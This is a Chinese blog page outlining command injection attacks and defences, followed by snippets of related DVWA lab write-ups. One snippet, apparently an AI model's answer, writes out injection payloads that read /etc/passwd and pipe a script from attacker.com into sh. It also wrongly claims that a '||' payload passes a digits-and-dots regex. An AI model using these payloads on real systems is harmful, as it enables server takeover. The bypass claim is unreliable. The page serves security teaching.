Command Injection（命令注入）

最新推荐文章于 2025-06-19 17:01:59 发布

原创最新推荐文章于 2025-06-19 17:01:59 发布 · 4.9k 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#web安全 #命令注入

web安全总结专栏收录该内容

11 篇文章

订阅专栏

本文深入解析了命令注入攻击，一种常见的网络安全威胁。介绍了其工作原理，包括如何利用未过滤的输入执行恶意命令，以及判断和利用的方法。文章还探讨了进阶技巧如延迟注入，并提供了有效的防御策略，如白名单和格式固定检测。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Command Injection（命令注入）

什么是命令注入
利用方法
- - 判断步骤
  - 使用
进阶
防御

什么是命令注入

恶意用户通过构造请求，对于一些执行系统命令的功能点进行构造注入，本质上是数据与代码未分离。对于特殊的需求没有对请求进行过滤，导致绕过从而导致注入。

利用方法

判断步骤

判断是否执行系统命令
判断函数或函数的参数是否可控判断函数或函数的参数是否可控
判断是否拼接注入命令判断是否拼接注入命令

使用

进阶

延迟注入：
远程请求
Dns查询

防御

白名单，格式固定检测

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

sh0rk

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

command injection

smileprint的博客

09-11

192

PHP stristr() 函数 PHP String 函数实例查找 “world” 在 “Hello world!” 中的第一次出现，并返回字符串的剩余部分： <?php echo stristr("Hello world!","WORLD"); ?> 定义和用法 stristr() 函数搜索字符串在另一字符串中的第一次出现。注释：该函数是二进制安全的。注释：该函数是不区分大小写的。如需进行区分大小写的搜索，请使用 strstr() 函数。语法 stristr(string,sea.

Command Injection

weixin_44259566的博客

01-09

1167

Command Injection command injection即命令注入，是指恶意用户通过构造请求，对于一些执行系统命令的功能点进行构造注入，本质上是数据与代码未分离。对于特殊的需求没有对请求进行过滤，导致绕过从而导致注入。一.low 首先我们查看下php代码。 php_uname(mode) 这个函数会返回运行php的操作系统的相关描述，参数mode可取值”a” （此为默认，包含序列...

参与评论您还未登录，请先登录后发表或查看评论

操作系统命令注入原理，（非常详细）零基础入门到精通，收藏这篇就够了

最新发布

Javachichi的博客

06-19

858

当Web应用在调用系统命令的函数时，如果没有对用户输入进行严格的过滤和验证，用户输入的恶意命令字符串就可能被作为系统命令的参数拼接到命令行中并执行，从而造成命令注入漏洞。内容概要：包括内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

command injection命令注入

weixin_34194379的博客

06-19

459

命令注入是指程序中有调用系统命令的部分，例如输入ip，程序调用系统命令ping这个ip。如果在ip后面加一个&&、&、|、||命令拼接符号再跟上自己需要执行的系统命令在ping设备的输入框中ip后面加上&ifconfig，或者其他命令 222.222.221.138&ifconfig 和文件上传漏洞对比相同点相同的地方是...

java入参为方法_Java命令注入原理结合Java Instrument技术（FreeBuf首发）

weixin_39633452的博客

01-25

700

一、前言命令注入：恶意用户构造恶意请求，对一些执行系统命令的功能点进行构造注入，从而达到执行命令的效果。二、演示环境搭建这里采用springboot+swagger搭建一个模拟的web环境：启动成功后访问：http://localhost:8090/swagger-ui.html#/command主要有三个接口:1 /command/exec/string 主要实现Runtime.get...

命令行注入（Command Injection）

Tangyoo的博客

07-03

2976

命令行注入攻击是指黑客通过把恶意代码输入一个输入机制（例如缺乏有效验证限制的表格域）来改变网页动态生成的内容的一种攻击手段。它允许攻击者执行系统命令，从而控制受影响的系统或服务器。命令行注入攻击作为一种严重的网络安全威胁，要求我们在开发、部署和维护Web应用程序时始终保持高度的警惕性。通过实施全面的防御策略，包括加强输入验证、使用安全的函数和机制、实施白名单验证、遵循最小权限原则、进行安全配置与更新、实时监控与响应以及加强开发者教育与培训等，我们可以显著降低命令注入攻击的风险。

DVWA靶场-Command Injection命令注入

mlws1900的博客

03-13

1487

比如PHP中的eval()函数，可以将函数中的参数当做PHP代码来执行，如果这些函数的参数控制不严格，可能会被利用，造成任意代码执行。命令注入（Command Injection）漏洞也称为远程命令/代码执行漏洞(RCE，Remote Command/Code Exec),指应用程序的某些功能需要调用可以执行系统命令的函数，如果这些函数或者函数的参数能被用户控制，就可能通过命令连接符将恶意命令拼接到正常的函数中，从而随意执行系统命令，属于高危漏洞之一。我们可以利用其他管道符进行绕过，例如|，||，&符号。

DVWA系列---Command Injection命令注入

野原新之助

01-23

707

文章目录一、前言1、命令注入2、命令拼接符二、Low级别（查看源代码）三、Medium级别（查看源代码）四、High级别（查看源代码）五、Impossible级别(查看源代码)六、防御方法一、前言 1、命令注入命令注入漏洞主要是指服务器对来自网络的语句，没有进行严格的过滤，导致在执行合法命令的同时，也执行了一些恶意构造的非法命令，使得服务器被破坏。通常命令注入是指os命令注入，即通过Shel...

Dvwa练习02 Command Injection 命令注入

coco3105的博客

01-09

449

用到了命令连接符，linux和windows支持的有所不同。

DVWA-Command Injection 命令注入

seanyang_的博客

06-12

1224

各种脚本语言都有可以调用系统命令的方法，如PHP语言中的system()、exec()等命令执行函数，可以执行系统命令，命令注入攻击，是指攻击者构造特殊的语句，将系统命令拼接到正常的用户输入，进而传递到命令执行函数的参数中，造成系统命令被执行的攻击方式。命令注入原理：PHP中常见的可执行系统命令的函数主要有：system()函数，执行给定的命令，输出并返回最后一行结果；exec()函数，执行给定的命令，不输出结果，只返回最后一行结果；

Java命令注入_java代码审计命令注入及修复建议

weixin_29374899的博客

02-12

1318

命令注入：是指通过提交恶意构造的参数破坏命令语句结构，从而达到执行恶意命令的目的。在Web应用中，有时候会用到一些命令执行的函数，如php中system、exec、shell_exec等，当对用户输入的命令没有进行限制或者过滤不严导致用户可以执行任意命令时，就会造成命令执行漏洞。命令注入漏洞主要表现为以下两种形式：1、攻击者能够算改程序执行的命令:攻击者直接控制了所执行的命令。2、攻击者能够复改命...

命令注入（Command Injection）安全漏洞（SQL注入、LDAP注入、OS命令注入、XPath注入、JavaScript注入）

Dontla的博客

07-12

1149

这些命令注入漏洞都是由于应用程序没有正确地验证和过滤用户输入导致的。为了防止这些漏洞，应该始终对用户输入进行验证、过滤和转义，使用参数化查询或预编译语句，以及遵循最小权限原则。此外，定期进行安全审计和漏洞扫描，及时修复发现的漏洞也是非常重要的。

OS Command Inject_Java

weixin_30823683的博客

07-14

194

目录 Code Audit Code Audit Runtime.getRuntime().exec(string str); System.exec(string str); 转载于:https://www.cnblogs.com/mysticbinary/articles/11182931.html...

【DVWA】12. Command Injection命令注入（乱码问题+Low+Medium）

Zichel77的博客

12-19

1267

未对用户输入进行充分验证和过滤：代码中使用 $_REQUEST[‘ip’] 获取用户输入的IP地址，然后直接将其拼接到 shell 命令中，存在命令注入的风险。执行系统命令的风险：使用 shell_exec 函数执行系统命令存在一定的风险，尤其是在执行用户输入的命令时。使用不可信的用户输入构造命令：代码中直接将用户输入的IP地址拼接到 shell 命令中，这种方式容易受到特殊字符和命令注入攻击的影响。通过提交恶意构造的参数破坏命令语句的结构，从而达到执行恶意命令的目的。

DVWA 之命令注入（Command Injection）

chtdgf的博客

01-31

1798

DVWA 之命令注入（Command Injection） 1.解决乱码问题在文本框中输入”ip address”后结果显示为乱码，如下图所示。解决此问题的方法：在DVWA-master\dvwa\includes目录下找到dvwaPage.inc.php文件中所有的”charset=utf-8”，修改”charset=gb2312” 2.基础知识 &&这个就是我们经常说的and，cmd1&&cmd2意思为当cmd1执行成功以后才执行cmd2，否则不执行cmd2 &a

DVWA系列之Command Injection(命令注入)源码分析及漏洞利用

7Riven's blog

11-26

2287

Command Injection Command Injection，即命令注入，是指通过提交恶意构造的参数破坏命令语句结构，从而达到执行恶意命令的目的。 PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一，国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。命令执行产生原因命令执行漏洞是指应用有时需要调用一些执行系统命令的函数如: system()、...

【java代码审计】命令注入

m0_52923241的博客

02-28

1792

开发者在某种开发需求时，需要引入对系统本地命令的支持来完成某些特定的功能，此时若未对用户的输入做严格的过滤，就可能发生命令注入。

DVWA实战篇- Command Injection（命令注入）

weixin_58660073的博客

06-03

1486

DVWA实战篇- Command Injection Command Injection（命令注入）一．漏洞描述在Web应用中，有时候会用到一些命令执行的函数，如php中system、exec、shell_exec等，当对用户输入的命令没有进行限制或者过滤不严导致用户可以执行任意命令时，就会造成命令执行漏洞。用户通过提交恶意构造的参数破坏命令语句结构，从而达到执行恶意命令的目的。二．漏洞实战 Low 源码分析： stristr函数查询实例中字符并输出直至结束实例<?php

dvwa靶场Command Injectionmin命令注入

04-02

<think>嗯，用户想了解DVWA靶场中的Command Injection漏洞测试和利用方法，需要详细步骤和示例。首先，我得回忆一下DVWA的基本设置，尤其是命令注入的模块。用户可能已经知道DVWA是什么，但可能需要先登录到Low安全级别开始测试。首先，命令注入通常发生在用户输入被拼接到系统命令中执行的情况下。在DVWA的Command Injection模块，用户输入一个IP地址，然后系统执行ping命令。这时候，如果输入没有经过严格的过滤，攻击者可以注入额外的命令。比如，在Low安全级别下，后端代码可能直接拼接用户输入的参数到ping命令中，而没有做任何过滤。这时候用户输入类似`127.0.0.1; ls`，分号后面的命令就会被执行。这时候需要给出具体的示例，比如如何利用不同的符号如`&&`、`|`或者`&`来注入命令。接下来，不同安全级别的防护措施不同。比如Medium级别可能过滤了一些符号，但可能没有完全覆盖，这时候需要测试哪些符号被转义或过滤了。比如，可能过滤了`;`和`&&`，但`|`可能仍然可用，或者需要尝试其他绕过方法，比如用`%0a`（换行符）来分隔命令。 High级别的防护可能更严格，可能只允许特定的输入格式，比如限制输入为IP地址格式。这时候可能需要利用IP地址的格式特性，比如使用`127.0.0.1 || ls`，如果代码检查IP格式是否合法，但后面的命令仍然会被执行的话。或者，使用反引号执行命令，如`$(ls)`。 Impossible级别可能使用了白名单或其他彻底防护的方法，这时候基本无法注入，需要说明其防护机制，比如使用escapeshellarg函数处理参数。在漏洞利用示例中，要分级别展示不同的注入方式，并说明如何通过Burp Suite这样的工具拦截请求，修改参数，或者直接在输入框中输入注入命令。还要注意不同操作系统下的命令差异，比如Windows和Linux的符号可能不同，但DVWA通常运行在Linux环境下。另外，生成的相关问题需要考虑用户可能进一步想知道如何防御命令注入，或者DVWA其他漏洞模块的测试方法，比如SQL注入或XSS。还要注意提醒用户只在合法授权的环境下进行测试，避免法律问题。现在需要确保回答结构清晰，步骤正确，示例准确，并且引用格式正确。要检查是否有遗漏的安全级别或常见绕过方法，比如使用反斜杠转义或者编码绕过过滤。同时，要确保给出的代码示例正确，比如PHP中可能存在漏洞的代码部分，以及防护措施如参数化执行或输入验证。</think># DVWA Command Injection漏洞测试与利用方法 ## 一、漏洞原理命令注入漏洞产生于未正确过滤用户输入的情况下，攻击者通过拼接系统命令实现任意命令执行。DVWA的Command Injection模块模拟了`ping`功能，其基础命令为： $$ ping -c 4 {user_input} $$ 当用户输入包含`;`、`&&`、`|`等命令分隔符时，可注入额外命令[^1]。 ## 二、安全测试步骤（分安全等级） ### 1. Low安全级别 **测试方法**： ```http POST /vulnerabilities/exec/ HTTP/1.1 Host: localhost ... ip=127.0.0.1;whoami&Submit=Submit ``` **注入示例**： - `127.0.0.1; ls /` 列出根目录 - `127.0.0.1 && cat /etc/passwd` 查看系统账户 ### 2. Medium安全级别 **过滤机制**： ```php $target = str_replace(';', '', $target); // 移除分号 ``` **绕过方法**： ```http ip=127.0.0.1%0aid && ping -c 4 127.0.0.1 ``` 使用换行符`%0a`或未过滤的`&`符号 ### 3. High安全级别 **防护代码**： ```php if( preg_match( '/^[0-9.]+$/i', $target ) ) // 限制数字和点号 ``` **绕过示例**： ```bash 127.0.0.1 || ls -al ``` 利用逻辑运算符绕过正则检测 ### 4. Impossible级别 **防护措施**： ```php $target = escapeshellarg($target); // 参数化处理 $cmd = shell_exec('ping -c 4 '.$target); ``` 此时无法进行命令注入 ## 三、漏洞利用演示 **Burp Suite拦截修改**： ```http POST /vulnerabilities/exec/ HTTP/1.1 ... ip=127.0.0.1;curl+http://attacker.com/shell.sh+|+sh ``` 该payload将下载并执行远程脚本 ## 四、防御方案 1. 使用`exec($command, $output)`替代直接命令拼接 2. 实施白名单验证： ```php if (!preg_match('/^[0-9.]+$/', $ip)) { die("Invalid IP format"); } ``` 3. 参数化处理： ```php $clean_ip = escapeshellarg($_POST['ip']); ```